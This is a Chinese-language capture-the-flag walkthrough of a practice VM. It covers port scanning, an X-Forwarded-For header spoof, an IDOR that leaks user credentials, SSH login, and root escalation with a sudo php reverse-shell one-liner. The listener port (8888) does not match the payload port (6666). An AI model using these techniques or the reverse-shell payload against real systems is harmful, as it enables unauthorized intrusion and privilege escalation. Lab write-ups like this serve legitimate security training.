您好,欢迎来到九壹网。
搜索
您的当前位置:首页Me-and靶机

Me-and靶机

来源:九壹网

设置靶机和kali两个网卡都为NAT模式

nmap 192.168.25.0/24

nmap 192.168.25.160

访问网站扫描出来的端口

访问主页,右击查看源代码发现让我们使用x-forwarded-for,这时我们想起了抓包

我们发现每换一次页面都需要添加x-forwarded-for:127.0.0.1

点击Register按钮时抓包,并填写下面资料

提交时同样抓包进行更改x-forwarded-for:127.0.0.1,并拿我们注册的账号密码登陆

来到这个页面我们发现URL中有id值

并尝试将id值改为1并查看profile,就会发现管理员的账号和密码(密码隐藏我们暂时看不到)

查看密码的方法有两种

第一种,F12检查页面将密码的type内容password,改为text

第二种,使用burp抓页面的包并查看密码

得知

id=1用户,账号:eweuhtandingan 密码:skuyatuh

id=2用户,账号:aingmaung 密码:qwerty!!!

id=3用户,账号:sundatea 密码:indONEsia

id=4用户,账号:indONEsia 密码:cedihhihihi

id=5用户,账号:alice 密码:4lic3

id=6用户,账号:abdikasepak 密码:dorrrrr

扫描端口时,我们看见SSH端口打开,我们使用终端尝试使用上面获得的账号密码连接,使用id=5的用户密码成功连接上

ssh alice@192.168.25.160

登陆上查看flag

ls -la
cd .my_secret
cat flag1.txt

反弹shell

使用sudo -l查看当前sudo权限

使用Linux进行监听

nc -lvnp 8888

配合sudo执行php拿到权限

sudo php -r '$sock=fsockopen("192.168.0.106",6666);exec("/bin/bash -i <&3 >&3 2>
&3");'

我们进入root权限查看flag2

cd /root
ls -la
cat flag2.txt

因篇幅问题不能全部显示,请点此查看更多更全内容

Copyright © 2019- 91gzw.com 版权所有 湘ICP备2023023988号-2

违法及侵权请联系:TEL:199 18 7713 E-MAIL:2724546146@qq.com

本站由北京市万商天勤律师事务所王兴未律师提供法律服务